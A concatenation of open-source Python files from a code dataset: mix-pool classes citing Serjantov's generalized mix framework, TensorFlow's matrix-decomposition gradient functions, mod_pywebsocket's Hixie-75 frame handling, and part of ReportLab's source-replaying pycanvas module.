"""As presented in Serjantov, PET 2007, 'A Fresh Look at the
Generalized Mix Framework.' (Testing only. Not necessarily
optimal.)"""
def _getFraction(self):
M = self.count()
return 1 - math.log(M)/float(M)
class SqrtGeneralMixPool(_BinomialMixin, TimedMixPool):
"""As presented in Serjantov, PET 2007, 'A Fresh Look at the
Generalized Mix Framework.' (Testing only. Not necessarily
optimal.)"""
def _getFraction(self):
M = self.count()
return 1 - math.sqrt(M)/float(M)
|
lakshayg/tensorflow
|
refs/heads/master
|
tensorflow/python/ops/linalg_grad.py
|
6
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Gradients for operators defined in linalg_ops.py.
Useful reference for derivative formulas is
An extended collection of matrix derivative results for forward and reverse
mode algorithmic differentiation by Mike Giles:
http://eprints.maths.ox.ac.uk/1079/1/NA-08-01.pdf
A detailed derivation of formulas for backpropagating through spectral layers
(SVD and Eig) by Ionescu, Vantzos & Sminchisescu:
https://arxiv.org/pdf/1509.07838v4.pdf
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.linalg import linalg_impl as _linalg
@ops.RegisterGradient("MatrixInverse")
def _MatrixInverseGrad(op, grad):
"""Gradient for MatrixInverse."""
ainv = op.outputs[0]
return -math_ops.matmul(
ainv, math_ops.matmul(grad, ainv, adjoint_b=True), adjoint_a=True)
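# Illustrative numerical check (not part of TensorFlow): for C = inv(A) and an
# upstream gradient G = dL/dC, the formula above gives dL/dA = -C^T @ G @ C^T
# in the real case, which can be verified against central finite differences.
def _example_check_inverse_grad():
  import numpy as np
  a = np.random.randn(3, 3) + 3.0 * np.eye(3)  # well-conditioned test matrix
  c = np.linalg.inv(a)
  g = np.random.randn(3, 3)                    # upstream gradient dL/dC
  grad_a = -c.T.dot(g).dot(c.T)
  eps = 1e-6
  e = np.zeros_like(a)
  e[0, 1] = eps
  numeric = (np.sum(g * np.linalg.inv(a + e)) -
             np.sum(g * np.linalg.inv(a - e))) / (2.0 * eps)
  assert abs(numeric - grad_a[0, 1]) < 1e-4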
@ops.RegisterGradient("MatrixDeterminant")
def _MatrixDeterminantGrad(op, grad):
"""Gradient for MatrixDeterminant."""
a = op.inputs[0]
c = op.outputs[0]
a_adj_inv = linalg_ops.matrix_inverse(a, adjoint=True)
multipliers = array_ops.reshape(grad * c,
array_ops.concat([array_ops.shape(c), [1, 1]],
0))
return multipliers * a_adj_inv
@ops.RegisterGradient("Cholesky")
def _CholeskyGrad(op, grad):
"""Gradient for Cholesky."""
# Gradient is l^{-H} @ ((l^{H} @ grad) * (tril(ones)-1/2*eye)) @ l^{-1}
l = op.outputs[0]
num_rows = array_ops.shape(l)[-1]
batch_shape = array_ops.shape(l)[:-2]
l_inverse = linalg_ops.matrix_triangular_solve(l,
linalg_ops.eye(
num_rows,
batch_shape=batch_shape,
dtype=l.dtype))
middle = math_ops.matmul(l, grad, adjoint_a=True)
middle = array_ops.matrix_set_diag(middle,
0.5 * array_ops.matrix_diag_part(middle))
middle = array_ops.matrix_band_part(middle, -1, 0)
grad_a = math_ops.matmul(
math_ops.matmul(l_inverse, middle, adjoint_a=True), l_inverse)
grad_a += _linalg.adjoint(grad_a)
return grad_a * 0.5
@ops.RegisterGradient("Qr")
def _QrGrad(op, dq, dr):
"""Gradient for Qr."""
q, r = op.outputs
if q.dtype.is_complex:
raise NotImplementedError("QrGrad not implemented for dtype: %s" % q.dtype)
if (r.shape.ndims is None or r.shape.as_list()[-2] is None or
r.shape.as_list()[-1] is None):
raise NotImplementedError("QrGrad not implemented with dynamic shapes.")
if r.shape[-2].value != r.shape[-1].value:
raise NotImplementedError("QrGrad not implemented when ncols > nrows "
"or full_matrices is true and ncols != nrows.")
qdq = math_ops.matmul(q, dq, adjoint_a=True)
qdq_ = qdq - _linalg.adjoint(qdq)
rdr = math_ops.matmul(r, dr, adjoint_b=True)
rdr_ = rdr - _linalg.adjoint(rdr)
tril = array_ops.matrix_band_part(qdq_ + rdr_, -1, 0)
def _TriangularSolve(x, r):
"""Equiv to matmul(x, adjoint(matrix_inverse(r))) if r is upper-tri."""
return _linalg.adjoint(
linalg_ops.matrix_triangular_solve(
r, _linalg.adjoint(x), lower=False, adjoint=False))
grad_a = math_ops.matmul(q, dr + _TriangularSolve(tril, r))
grad_b = _TriangularSolve(dq - math_ops.matmul(q, qdq), r)
return grad_a + grad_b
@ops.RegisterGradient("MatrixSolve")
def _MatrixSolveGrad(op, grad):
"""Gradient for MatrixSolve."""
a = op.inputs[0]
adjoint_a = op.get_attr("adjoint")
c = op.outputs[0]
grad_b = linalg_ops.matrix_solve(a, grad, adjoint=not adjoint_a)
if adjoint_a:
grad_a = -math_ops.matmul(c, grad_b, adjoint_b=True)
else:
grad_a = -math_ops.matmul(grad_b, c, adjoint_b=True)
return (grad_a, grad_b)
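# Illustrative numerical check (not part of TensorFlow): for C = solve(A, B),
# dC = A^{-1} (dB - dA C), so grad_B = A^{-T} G and grad_A = -grad_B C^T in
# the real, non-adjoint case, matching the formulas above.
def _example_check_solve_grad():
  import numpy as np
  a = np.random.randn(3, 3) + 3.0 * np.eye(3)
  b = np.random.randn(3, 2)
  c = np.linalg.solve(a, b)
  g = np.random.randn(3, 2)            # upstream gradient dL/dC
  grad_b = np.linalg.solve(a.T, g)
  grad_a = -grad_b.dot(c.T)
  eps = 1e-6
  e = np.zeros_like(a)
  e[1, 2] = eps
  numeric = (np.sum(g * np.linalg.solve(a + e, b)) -
             np.sum(g * np.linalg.solve(a - e, b))) / (2.0 * eps)
  assert abs(numeric - grad_a[1, 2]) < 1e-4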
@ops.RegisterGradient("MatrixSolveLs")
def _MatrixSolveLsGrad(op, grad):
"""Gradients for MatrixSolveLs."""
# TODO(rmlarsen): The implementation could be more efficient:
# a) Output the Cholesky factorization from forward op instead of
# recomputing it here.
# b) Implement a symmetric rank-k update op instead of computing
# x*z + transpose(x*z). This pattern occurs other places in TensorFlow.
def _Overdetermined(op, grad):
"""Gradients for the overdetermined case of MatrixSolveLs.
This is the backprop for the solution to the normal equations of the first
kind:
X = F(A, B) = (A^T * A + lambda * I)^{-1} * A^T * B
which solve the least squares problem
min ||A * X - B||_F^2 + lambda ||X||_F^2.
"""
a = op.inputs[0]
b = op.inputs[1]
x = op.outputs[0]
l2_regularizer = math_ops.cast(op.inputs[2], a.dtype.base_dtype)
# pylint: disable=protected-access
chol = linalg_ops._RegularizedGramianCholesky(
a, l2_regularizer=l2_regularizer, first_kind=True)
# pylint: enable=protected-access
# Temporary z = (A^T * A + lambda * I)^{-1} * grad.
z = linalg_ops.cholesky_solve(chol, grad)
xzt = math_ops.matmul(x, z, adjoint_b=True)
zx_sym = xzt + array_ops.matrix_transpose(xzt)
grad_a = -math_ops.matmul(a, zx_sym) + math_ops.matmul(b, z, adjoint_b=True)
grad_b = math_ops.matmul(a, z)
return (grad_a, grad_b, None)
def _Underdetermined(op, grad):
"""Gradients for the underdetermined case of MatrixSolveLs.
This is the backprop for the solution to the normal equations of the second
kind:
X = F(A, B) = A * (A*A^T + lambda*I)^{-1} * B
that (for lambda=0) solve the least squares problem
min ||X||_F subject to A*X = B.
"""
a = op.inputs[0]
b = op.inputs[1]
l2_regularizer = math_ops.cast(op.inputs[2], a.dtype.base_dtype)
# pylint: disable=protected-access
chol = linalg_ops._RegularizedGramianCholesky(
a, l2_regularizer=l2_regularizer, first_kind=False)
# pylint: enable=protected-access
grad_b = linalg_ops.cholesky_solve(chol, math_ops.matmul(a, grad))
# Temporary tmp = (A * A^T + lambda * I)^{-1} * B.
tmp = linalg_ops.cholesky_solve(chol, b)
a1 = math_ops.matmul(tmp, a, adjoint_a=True)
a1 = -math_ops.matmul(grad_b, a1)
a2 = grad - math_ops.matmul(a, grad_b, adjoint_a=True)
a2 = math_ops.matmul(tmp, a2, adjoint_b=True)
grad_a = a1 + a2
return (grad_a, grad_b, None)
fast = op.get_attr("fast")
if fast is False:
raise ValueError("Gradient not defined for fast=False")
matrix_shape = op.inputs[0].get_shape()[-2:]
if matrix_shape.is_fully_defined():
if matrix_shape[-2] >= matrix_shape[-1]:
return _Overdetermined(op, grad)
else:
return _Underdetermined(op, grad)
else:
# We have to defer determining the shape to runtime and use
# conditional execution of the appropriate graph.
matrix_shape = array_ops.shape(op.inputs[0])[-2:]
return control_flow_ops.cond(matrix_shape[-2] >= matrix_shape[-1],
lambda: _Overdetermined(op, grad),
lambda: _Underdetermined(op, grad))
@ops.RegisterGradient("MatrixTriangularSolve")
def _MatrixTriangularSolveGrad(op, grad):
"""Gradient for MatrixTriangularSolve."""
a = op.inputs[0]
adjoint_a = op.get_attr("adjoint")
lower_a = op.get_attr("lower")
c = op.outputs[0]
grad_b = linalg_ops.matrix_triangular_solve(
a, grad, lower=lower_a, adjoint=not adjoint_a)
if adjoint_a:
grad_a = -math_ops.matmul(c, grad_b, adjoint_b=True)
else:
grad_a = -math_ops.matmul(grad_b, c, adjoint_b=True)
if lower_a:
grad_a = array_ops.matrix_band_part(grad_a, -1, 0)
else:
grad_a = array_ops.matrix_band_part(grad_a, 0, -1)
return (grad_a, grad_b)
@ops.RegisterGradient("SelfAdjointEigV2")
def _SelfAdjointEigV2Grad(op, grad_e, grad_v):
"""Gradient for SelfAdjointEigV2."""
e = op.outputs[0]
compute_v = op.get_attr("compute_v")
# a = op.inputs[0], which satisfies
# a[...,:,:] * v[...,:,i] = e[...,i] * v[...,i]
with ops.control_dependencies([grad_e, grad_v]):
if compute_v:
v = op.outputs[1]
# Construct the matrix f(i,j) = (i != j ? 1 / (e_i - e_j) : 0).
# Notice that because of the term involving f, the gradient becomes
# infinite (or NaN in practice) when eigenvalues are not unique.
# Mathematically this should not be surprising, since for (k-fold)
# degenerate eigenvalues, the corresponding eigenvectors are only defined
# up to arbitrary rotation in a (k-dimensional) subspace.
f = array_ops.matrix_set_diag(
math_ops.reciprocal(
array_ops.expand_dims(e, -2) - array_ops.expand_dims(e, -1)),
array_ops.zeros_like(e))
grad_a = math_ops.matmul(
v,
math_ops.matmul(
array_ops.matrix_diag(grad_e) +
f * math_ops.matmul(v, grad_v, adjoint_a=True),
v,
adjoint_b=True))
else:
_, v = linalg_ops.self_adjoint_eig(op.inputs[0])
grad_a = math_ops.matmul(v,
math_ops.matmul(
array_ops.matrix_diag(grad_e),
v,
adjoint_b=True))
# The forward op only depends on the lower triangular part of a, so here we
# symmetrize and take the lower triangle
grad_a = array_ops.matrix_band_part(grad_a + _linalg.adjoint(grad_a), -1, 0)
grad_a = array_ops.matrix_set_diag(grad_a,
0.5 * array_ops.matrix_diag_part(grad_a))
return grad_a
@ops.RegisterGradient("Svd")
def _SvdGrad(op, grad_s, grad_u, grad_v):
"""Gradient for the singular value decomposition."""
# The derivation for the compute_uv=False case, and most of
# the derivation for the full_matrices=True case, are in
# Giles' paper (see reference at top of file). A derivation for
# the full_matrices=False case is available at
# https://j-towns.github.io/papers/svd-derivative.pdf
a = op.inputs[0]
a_shape = a.get_shape().with_rank_at_least(2)
if op.get_attr("compute_uv"):
# TODO(rmlarsen): Make this work with complex types.
if a.dtype.is_complex:
raise NotImplementedError(
"SVD gradient is not implemented for complex types and "
"compute_uv=True.")
grad_u_shape = grad_u.get_shape().with_rank_at_least(2)
grad_v_shape = grad_v.get_shape().with_rank_at_least(2)
m = a_shape[-2].merge_with(grad_u_shape[-2])
n = a_shape[-1].merge_with(grad_v_shape[-2])
batch_shape = a_shape[:-2].merge_with(grad_u_shape[:-2]).merge_with(
grad_v_shape[:-2])
a_shape = batch_shape.concatenate([m, n])
m = a_shape[-2].value
n = a_shape[-1].value
# TODO(rmlarsen): Make this work with placeholders.
if m is None or n is None:
raise NotImplementedError(
"SVD gradient has not been implemented for input with unknown "
"inner matrix shape.")
if not op.get_attr("compute_uv"):
s, u, v = linalg_ops.svd(a, compute_uv=True, full_matrices=True)
else:
s = op.outputs[0]
u = op.outputs[1]
v = op.outputs[2]
use_adjoint = False
if m > n:
# Compute the gradient for A^H = V * S^T * U^H, and (implicitly) take the
# Hermitian transpose of the gradient at the end.
use_adjoint = True
m, n = n, m
u, v = v, u
grad_u, grad_v = grad_v, grad_u
with ops.control_dependencies([grad_s, grad_u, grad_v]):
grad_s_mat = array_ops.matrix_diag(grad_s)
if not op.get_attr("compute_uv"):
if use_adjoint:
grad_a = math_ops.matmul(
v[..., :, :m], math_ops.matmul(u, grad_s_mat), adjoint_b=True)
else:
grad_a = math_ops.matmul(u,
math_ops.matmul(
grad_s_mat, v[..., :, :m], adjoint_b=True))
grad_a.set_shape(a_shape)
return grad_a
if op.get_attr("full_matrices") and abs(m - n) > 1:
raise NotImplementedError(
"svd gradient is not implemented for abs(m - n) > 1 "
"when full_matrices is True")
s_mat = array_ops.matrix_diag(s)
s2 = math_ops.square(s)
# NOTICE: Because of the term involving f, the gradient becomes
# infinite (or NaN in practice) when singular values are not unique.
# Mathematically this should not be surprising, since for (k-fold)
# degenerate singular values, the corresponding singular vectors are
  # only defined up to a (k-dimensional) subspace. In practice, this can
# lead to numerical instability when singular values are close but not
# exactly equal.
f = array_ops.matrix_set_diag(
math_ops.reciprocal(
array_ops.expand_dims(s2, -2) - array_ops.expand_dims(s2, -1)),
array_ops.zeros_like(s))
s_inv_mat = array_ops.matrix_diag(math_ops.reciprocal(s))
v1 = v[..., :, :m]
grad_v1 = grad_v[..., :, :m]
u_gu = math_ops.matmul(u, grad_u, adjoint_a=True)
v_gv = math_ops.matmul(v1, grad_v1, adjoint_a=True)
f_u = f * u_gu
f_v = f * v_gv
term1_nouv = (
grad_s_mat + math_ops.matmul(f_u + _linalg.adjoint(f_u), s_mat) +
math_ops.matmul(s_mat, f_v + _linalg.adjoint(f_v)))
term1 = math_ops.matmul(u, math_ops.matmul(term1_nouv, v1, adjoint_b=True))
if m == n:
grad_a_before_transpose = term1
else:
gv1t = array_ops.matrix_transpose(grad_v1)
gv1t_v1 = math_ops.matmul(gv1t, v1)
term2_nous = gv1t - math_ops.matmul(gv1t_v1, v1, adjoint_b=True)
if op.get_attr("full_matrices"):
v2 = v[..., :, m:n]
grad_v2 = grad_v[..., :, m:n]
v1t_gv2 = math_ops.matmul(v1, grad_v2, adjoint_a=True)
term2_nous -= math_ops.matmul(v1t_gv2, v2, adjoint_b=True)
u_s_inv = math_ops.matmul(u, s_inv_mat)
term2 = math_ops.matmul(u_s_inv, term2_nous)
grad_a_before_transpose = term1 + term2
if use_adjoint:
grad_a = array_ops.matrix_transpose(grad_a_before_transpose)
else:
grad_a = grad_a_before_transpose
grad_a.set_shape(a_shape)
return grad_a
|
espadrine/opera
|
refs/heads/master
|
chromium/src/third_party/WebKit/Tools/Scripts/webkitpy/thirdparty/mod_pywebsocket/_stream_hixie75.py
|
681
|
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""This file provides a class for parsing/building frames of the WebSocket
protocol version HyBi 00 and Hixie 75.
Specification:
- HyBi 00 http://tools.ietf.org/html/draft-ietf-hybi-thewebsocketprotocol-00
- Hixie 75 http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-75
"""
from mod_pywebsocket import common
from mod_pywebsocket._stream_base import BadOperationException
from mod_pywebsocket._stream_base import ConnectionTerminatedException
from mod_pywebsocket._stream_base import InvalidFrameException
from mod_pywebsocket._stream_base import StreamBase
from mod_pywebsocket._stream_base import UnsupportedFrameException
from mod_pywebsocket import util
class StreamHixie75(StreamBase):
"""A class for parsing/building frames of the WebSocket protocol version
HyBi 00 and Hixie 75.
"""
def __init__(self, request, enable_closing_handshake=False):
"""Construct an instance.
Args:
request: mod_python request.
enable_closing_handshake: to let StreamHixie75 perform closing
handshake as specified in HyBi 00, set
this option to True.
"""
StreamBase.__init__(self, request)
self._logger = util.get_class_logger(self)
self._enable_closing_handshake = enable_closing_handshake
self._request.client_terminated = False
self._request.server_terminated = False
def send_message(self, message, end=True, binary=False):
"""Send message.
Args:
message: unicode string to send.
binary: not used in hixie75.
Raises:
BadOperationException: when called on a server-terminated
connection.
"""
if not end:
raise BadOperationException(
'StreamHixie75 doesn\'t support send_message with end=False')
if binary:
raise BadOperationException(
'StreamHixie75 doesn\'t support send_message with binary=True')
if self._request.server_terminated:
raise BadOperationException(
'Requested send_message after sending out a closing handshake')
self._write(''.join(['\x00', message.encode('utf-8'), '\xff']))
def _read_payload_length_hixie75(self):
"""Reads a length header in a Hixie75 version frame with length.
Raises:
ConnectionTerminatedException: when read returns empty string.
"""
length = 0
while True:
b_str = self._read(1)
b = ord(b_str)
length = length * 128 + (b & 0x7f)
if (b & 0x80) == 0:
break
return length
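# Illustrative counterpart (hedged sketch, not part of the original
# module): the header parsed above is a big-endian base-128 "varint"
# whose continuation flag lives in the high bit of each byte. A sender
# could build it like this (the helper name is hypothetical):
#
#   def _encode_payload_length_hixie75(length):
#       digits = []
#       while True:
#           digits.append(length & 0x7f)
#           length >>= 7
#           if length == 0:
#               break
#       # most significant group first; 0x80 set on all but the last byte
#       return ''.join(chr(d | 0x80) for d in digits[:0:-1]) + chr(digits[0])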
def receive_message(self):
"""Receive a WebSocket frame and return its payload an unicode string.
Returns:
payload unicode string in a WebSocket frame.
Raises:
ConnectionTerminatedException: when read returns empty
string.
BadOperationException: when called on a client-terminated
connection.
"""
if self._request.client_terminated:
raise BadOperationException(
'Requested receive_message after receiving a closing '
'handshake')
while True:
# Read 1 byte.
# mp_conn.read will block if no bytes are available.
# Timeout is controlled by TimeOut directive of Apache.
frame_type_str = self.receive_bytes(1)
frame_type = ord(frame_type_str)
if (frame_type & 0x80) == 0x80:
# The payload length is specified in the frame.
# Read and discard.
length = self._read_payload_length_hixie75()
if length > 0:
_ = self.receive_bytes(length)
# 5.3 3. 12. if /type/ is 0xFF and /length/ is 0, then set the
# /client terminated/ flag and abort these steps.
if not self._enable_closing_handshake:
continue
if frame_type == 0xFF and length == 0:
self._request.client_terminated = True
if self._request.server_terminated:
self._logger.debug(
'Received ack for server-initiated closing '
'handshake')
return None
self._logger.debug(
'Received client-initiated closing handshake')
self._send_closing_handshake()
self._logger.debug(
'Sent ack for client-initiated closing handshake')
return None
else:
# The payload is delimited with \xff.
bytes = self._read_until('\xff')
# The WebSocket protocol section 4.4 specifies that invalid
# characters must be replaced with U+fffd REPLACEMENT
# CHARACTER.
message = bytes.decode('utf-8', 'replace')
if frame_type == 0x00:
return message
# Discard data of other types.
def _send_closing_handshake(self):
if not self._enable_closing_handshake:
raise BadOperationException(
'Closing handshake is not supported in Hixie 75 protocol')
self._request.server_terminated = True
# 5.3 the server may decide to terminate the WebSocket connection by
# running through the following steps:
# 1. send a 0xFF byte and a 0x00 byte to the client to indicate the
# start of the closing handshake.
self._write('\xff\x00')
def close_connection(self, unused_code='', unused_reason=''):
"""Closes a WebSocket connection.
Raises:
ConnectionTerminatedException: when the closing handshake was
not successful.
"""
if self._request.server_terminated:
self._logger.debug(
'Requested close_connection but server is already terminated')
return
if not self._enable_closing_handshake:
self._request.server_terminated = True
self._logger.debug('Connection closed')
return
self._send_closing_handshake()
self._logger.debug('Sent server-initiated closing handshake')
# TODO(ukai): 2. wait until the /client terminated/ flag has been set,
# or until a server-defined timeout expires.
#
# For now, we expect receiving closing handshake right after sending
# out closing handshake, and if we couldn't receive non-handshake
# frame, we take it as ConnectionTerminatedException.
message = self.receive_message()
if message is not None:
raise ConnectionTerminatedException(
'Didn\'t receive valid ack for closing handshake')
# TODO: 3. close the WebSocket connection.
# note: mod_python Connection (mp_conn) doesn't have close method.
def send_ping(self, body):
raise BadOperationException(
'StreamHixie75 doesn\'t support send_ping')
# vi:sts=4 sw=4 et
|
alanjw/GreenOpenERP-Win-X86
|
refs/heads/7.0
|
python/Lib/site-packages/reportlab/pdfgen/pycanvas.py
|
3
|
# a Pythonesque Canvas v0.8
# Author : Jerome Alet - <alet@librelogiciel.com>
# License : ReportLab's license
#
# $Id: pycanvas.py 3777 2010-09-15 15:15:46Z rgbecker $
#
__doc__ = """A contributed Canvas class which can also output Python source code to "replay" operations later
pycanvas.Canvas class works exactly like canvas.Canvas, but you can
call str() on pycanvas.Canvas instances. Doing so will return the
Python source code equivalent to your own program, which would, when
run, produce the same PDF document as your original program.
Generated Python source code defines a doIt() function which accepts
a filename or file-like object as its first parameter, and an
optional boolean parameter named "regenerate".
The doIt() function will generate a PDF document and save it in the
file you specified in this argument. If the regenerate parameter is
set then it will also return an automatically generated equivalent
Python source code as a string of text, which you can run again to
produce the very same PDF document and the Python source code, which
you can run again... ad nauseam ! If the regenerate parameter is
unset or not used at all (it then defaults to being unset) then None
is returned and the doIt() function is much faster, even faster
than the original non-serialized program.
The tests/test_pdfgen_pycanvas.py program is the test suite
for pycanvas; you can do the following to run it :
First set verbose=1 in reportlab/rl_config.py
then from the command interpreter :
$ cd tests
$ python test_pdfgen_pycanvas.py >n1.py
this will produce both n1.py and test_pdfgen_pycanvas.pdf
then :
$ python n1.py n1.pdf >n2.py
$ python n2.py n2.pdf >n3.py
$ ...
n1.py, n2.py, n3.py and so on will be identical files.
they may eventually end up being a bit different because of
rounding problems, mostly in the comments, but this
doesn't matter since the values really are the same
(e.g. 0 instead of 0.0, or .53 instead of 0.53)
n1.pdf, n2.pdf, n3.pdf and so on will be PDF files
similar to test_pdfgen_pycanvas.pdf.
Alternatively you can import n1.py (or n3.py, or n16384.py if you prefer)
in your own program, and then call its doIt function :
import n1
pythonsource = n1.doIt("myfile.pdf", regenerate=1)
Or if you don't need the python source code and want a faster result :
import n1
n1.doIt("myfile.pdf")
When the generated source code is run directly as an independent program,
then the equivalent python source code is printed to stdout, e.g. :
python n1.py
will print the python source code equivalent to n1.py
Why would you want to use such a beast ?
- To linearize (serialize?) a program : optimizing some complex
parts for example.
- To debug : reading the generated Python source code may help you or
the ReportLab team to diagnose problems. The generated code is now
clearly commented and shows nesting levels, page numbers, and so
on. You can use the generated script when asking for support : we
can see the results you obtain without needing your data or complete
application.
- To create standalone scripts : say your program uses a high level
environment to generate its output (databases, RML, etc...), using
this class would give you an equivalent program but with complete
independence from the high level environment (e.g. if you don't
have Oracle).
- To contribute some nice looking PDF documents to the ReportLab website
without having to send a complete application you don't want to
distribute.
- ... Insert your own ideas here ...
- For fun because you can do it !
"""
import cStringIO
from reportlab.pdfgen import canvas
from reportlab.pdfgen import pathobject
from reportlab.pdfgen import textobject
PyHeader = '''#! /usr/bin/env python
#
# This code was entirely generated by ReportLab (http://www.reportlab.com)
#
import sys
from reportlab.pdfgen import pathobject
from reportlab.pdfgen import textobject
from reportlab.lib.colors import Color
def doIt(file, regenerate=0) :
"""Generates a PDF document, save it into file.
file : either a filename or a file-like object.
regenerate : if set then this function returns the Python source
code which when run will produce the same result.
if unset then this function returns None, and is
much faster.
"""
if regenerate :
from reportlab.pdfgen.pycanvas import Canvas
else :
from reportlab.pdfgen.canvas import Canvas
'''
PyFooter = '''
# if we want the equivalent Python source code, then send it back
if regenerate :
return str(c)
if __name__ == "__main__" :
if len(sys.argv) != 2 :
# second argument must be the name of the PDF file to create
sys.stderr.write("%s needs one and only one argument\\n" % sys.argv[0])
sys.exit(-1)
else :
# we've got a filename, we can proceed.
print doIt(sys.argv[1], regenerate=1)
sys.exit(0)'''
def buildargs(*args, **kwargs) :
"""Constructs a printable list of arguments suitable for use in source function calls."""
arguments = ""
for arg in args :
arguments = arguments + ("%s, " % repr(arg))
for (kw, val) in kwargs.items() :
arguments = arguments+ ("%s=%s, " % (kw, repr(val)))
if arguments[-2:] == ", " :
arguments = arguments[:-2]
return arguments
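# For example (illustration only, not in the original module):
#   buildargs(1, "a", flag=True) -> "1, 'a', flag=True"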
class PDFAction :
"""Base class to fake method calls or attributes on PDF objects (Canvas, PDFPathObject, PDFTextObject)."""
def __init__(self, parent, action) :
"""Saves a pointer to the parent object, and the method name."""
self._parent = parent
self._action = action
def __getattr__(self, name) :
"""Probably a method call on an attribute, returns the real one."""
return getattr(getattr(self._parent._object, self._action), name)
def __call__(self, *args, **kwargs) :
"""The fake method is called, print it then call the real one."""
if not self._parent._parent._in :
self._precomment()
self._parent._parent._PyWrite(" %s.%s(%s)" % (self._parent._name, self._action, buildargs(*args, **kwargs)))
self._postcomment()
self._parent._parent._in = self._parent._parent._in + 1
retcode = getattr(self._parent._object, self._action)(*args,**kwargs)
self._parent._parent._in = self._parent._parent._in - 1
return retcode
def __hash__(self) :
return hash(getattr(self._parent._object, self._action))
def __coerce__(self, other) :
"""Needed."""
return coerce(getattr(self._parent._object, self._action), other)
def _precomment(self) :
"""To be overriden."""
pass
def _postcomment(self) :
"""To be overriden."""
pass
class PDFObject :
"""Base class for PDF objects like PDFPathObject and PDFTextObject."""
_number = 0
def __init__(self, parent) :
"""Saves a pointer to the parent Canvas."""
self._parent = parent
self._initdone = 0
def __getattr__(self, name) :
"""The user's programs wants to call one of our methods or get an attribute, fake it."""
return PDFAction(self, name)
def __repr__(self) :
"""Returns the name used in the generated source code (e.g. 'p' or 't')."""
return self._name
def __call__(self, *args, **kwargs) :
"""Real object initialisation is made here, because now we've got the arguments."""
if not self._initdone :
self.__class__._number = self.__class__._number + 1
methodname = self._postinit(*args,**kwargs)
self._parent._PyWrite("\n # create PDF%sObject number %i\n %s = %s.%s(%s)" % (methodname[5:], self.__class__._number, self._name, self._parent._name, methodname, buildargs(*args,**kwargs)))
self._initdone = 1
return self
class Canvas :
"""Our fake Canvas class, which will intercept each and every method or attribute access."""
class TextObject(PDFObject) :
_name = "t"
def _postinit(self, *args, **kwargs) :
self._object = textobject.PDFTextObject(self._parent,*args,**kwargs)
return "beginText"
class PathObject(PDFObject) :
_name = "p"
def _postinit(self, *args, **kwargs) :
self._object = pathobject.PDFPathObject(*args, **kwargs)
return "beginPath"
class Action(PDFAction) :
"""Class called for every Canvas method call."""
def _precomment(self) :
"""Outputs comments before the method call."""
if self._action == "showPage" :
self._parent._PyWrite("\n # Ends page %i" % self._parent._pagenumber)
elif self._action == "saveState" :
state = {}
d = self._parent._object.__dict__
for name in self._parent._object.STATE_ATTRIBUTES:
state[name] = d[name]
self._parent._PyWrite("\n # Saves context level %i %s" % (self._parent._contextlevel, state))
self._parent._contextlevel = self._parent._contextlevel + 1
elif self._action == "restoreState" :
self._parent._contextlevel = self._parent._contextlevel - 1
self._parent._PyWrite("\n # Restores context level %i %s" % (self._parent._contextlevel, self._parent._object.state_stack[-1]))
elif self._action == "beginForm" :
self._parent._formnumber = self._parent._formnumber + 1
self._parent._PyWrite("\n # Begins form %i" % self._parent._formnumber)
elif self._action == "endForm" :
self._parent._PyWrite("\n # Ends form %i" % self._parent._formnumber)
elif self._action == "save" :
self._parent._PyWrite("\n # Saves the PDF document to disk")
def _postcomment(self) :
"""Outputs comments after the method call."""
if self._action == "showPage" :
self._parent._pagenumber = self._parent._pagenumber + 1
self._parent._PyWrite("\n # Begins page %i" % self._parent._pagenumber)
elif self._action in [ "endForm", "drawPath", "clipPath" ] :
self._parent._PyWrite("")
_name = "c"
def __init__(self, *args, **kwargs) :
"""Initialize and begins source code."""
self._parent = self # nice trick, isn't it ?
self._in = 0
self._contextlevel = 0
self._pagenumber = 1
self._formnumber = 0
self._footerpresent = 0
self._object = canvas.Canvas(*args,**kwargs)
self._enforceColorSpace = self._object._enforceColorSpace
self._pyfile = cStringIO.StringIO()
self._PyWrite(PyHeader)
try :
del kwargs["filename"]
except KeyError :
pass
self._PyWrite(" # create the PDF document\n %s = Canvas(file, %s)\n\n # Begins page 1" % (self._name, buildargs(*args[1:], **kwargs)))
def __nonzero__(self) :
"""This is needed by platypus' tables."""
return 1
def __str__(self) :
"""Returns the equivalent Python source code."""
if not self._footerpresent :
self._PyWrite(PyFooter)
self._footerpresent = 1
return self._pyfile.getvalue()
def __getattr__(self, name) :
"""Method or attribute access."""
